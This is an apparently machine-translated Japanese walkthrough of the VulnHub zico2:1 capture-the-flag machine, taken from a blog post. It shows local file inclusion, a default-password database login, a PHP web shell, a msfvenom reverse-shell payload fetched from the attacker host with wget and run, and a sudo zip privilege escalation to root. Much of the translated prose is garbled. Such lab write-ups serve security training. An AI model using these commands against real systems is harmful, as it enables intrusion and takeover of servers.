28号-VulnHub-zico2:1 - チュートリアル浸透研究

**

VulnHub-zico2:1 - チュートリアル

**

ドローンアドレスします。https://www.vulnhub.com/entry/zico2-1,210/
ドローン難易度:中級(CTF)
ドローン発売日:2017年6月19日
ドローン説明:
ジーコは自分のウェブサイトを構築しようとしています、しかし、我々は、使用するCMSの選択にいくつかの問題がありました。いくつかの一般的な方法を試した後、彼は彼自身の道を建設することを決めました。それはいいアイデアですか?
ヒント:列挙、列挙および列挙!
目標:rootアクセスを取得&flag.txt見つける
著者:太夫
時刻:2020年1月23日
注:これらのすべてのコンピュータの場合、私は、VMwareを実行しているコンピュータを使用してダウンロードしたの。私は、攻撃者のマシンCTFに対する解決策として、カーリーのLinuxを使用します。ここだけの教育目的のために学習するための技術の使用は、技術は他の目的のためにリストされている場合、私は責任を負いかねます。

まず、情報収集

ここに画像を挿入説明
私たちは、宛先IPアドレスを取得するために、VMのIPアドレスに使用nmapのを標的を同定する必要があります:
ここに画像を挿入説明
私たちは、CTFのターゲットコンピュータのIPアドレスを見つけた:192.168.56.128
ここに画像を挿入説明
22,80,111,50702にnmapのポートスキャンがオンになっています...
検出Webポート:
ここに画像を挿入説明
断っ...
ここに画像を挿入説明
入力する]をクリックし...
ここに画像を挿入説明
あなたはtools.htmlページのURLを参照してくださいすることができます... LFIの試みの影響を受ける可能性があり...
ここに画像を挿入説明
LFIを取得し、正常/ ... / ... / etc / passwdファイルを使用しようとする ... こちらをご覧くださいジーコのユーザーが...
以前、私が見てみブラスト列挙よ、列挙するために私たちを促した...
ここに画像を挿入説明
/ DBADMIN /ブラウズディレクトリがtest_db.phpファイルを見つけた...それへのアクセスが
ここに画像を挿入説明
... PHPのデータベースのログインページとバージョン名を見ることができ
ここに画像を挿入説明
、デフォルトのパスワードadminを使用します成功裏に...ログインして
ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
ここに存在見ることができ、私はあなたが右に...提供できる3つの方法があります見つかった
ページに挿入したファイルのアップロード... LFI注入...書き込みシェルが...
ここに画像を挿入説明
ここに画像を挿入説明
手順の見直しをして...準じて行うことができた後
ここに画像を挿入説明
、コマンド:? <PHPエコーシステム( $ _GET [「CMD」]) ;?> ここに画像を挿入説明
あなたは、PHPコードのスクリプトは、データベースに保存されている見ることができます...
ここに画像を挿入説明

第二に、言及する権利

ファイルを実行し...ここにあなたがに位置WWW-データを見ることができます...
ここでの考え方は非常に簡単です、最初のローカル...上のシェルを作成
ここに画像を挿入説明
します。コマンドをmsfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f elf > shell
ここに画像を挿入説明
、オープンMSFが、シェルをアップロードすることは簡単である理由、残念ながら私にはわかりませんオープンは許可を得ることができますが、それは生と死はありませんが、私は、ヘルプMSFはこのドローンが最初の得点置くことができ、または他のメンタリティが爆発...
ここに画像を挿入説明
コマンドを:<?php system("cd /tmp;wget http://192.168.56.103:8000/shell;chmod +x shell;./shell");?>
ここに画像を挿入説明
再訪の下に...
ここに画像を挿入説明
ここに...ここに成功したジーコを入力する許可を得ましたユーザーはWordPressのディレクトリを検索した後、アカウントのパスワードを見ることができるのwp-config.phpのファイルが存在しなければならない...常識に行く
ここに画像を挿入説明
sWfCsfJSPV9H3AmQzw8
ここに画像を挿入説明
SSH成功した着陸...
ここに画像を挿入説明
コマンド:sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
あなたは、tarやジップユーザーが入力しなくても、rootとしてコマンドを実行することができます見ることができます任意のパスワードは...
その後、rootシェルを開く、それ解凍し、ラジ圧縮ファイルを提出し、その後/tmp/nisha.zipフォルダに移動します...

成功したroot権限見つかったflag.txt ...

我々はこのようにシンプルなドローンを完了し、成功したroot権限き&flag.txtを見つけてきたので、私はあなたがこの機械のように願って、学ぶための演習と一緒に、後半より挑戦的なマシンよりもあるだろう大に注力することを続けてください。

あなたはウェルカムメッセージの他の方法を持っている場合。そこに間違った場所ならば、あなたは私に言う必要があります。あなたが書き込み良いにこのブログを見つけた場合は、周りの人々を共有することを歓迎します。

ここに画像を挿入説明

公開された28元の記事 ウォンの賞賛4 ビュー4404

おすすめ

転載: blog.csdn.net/qq_34801745/article/details/104077562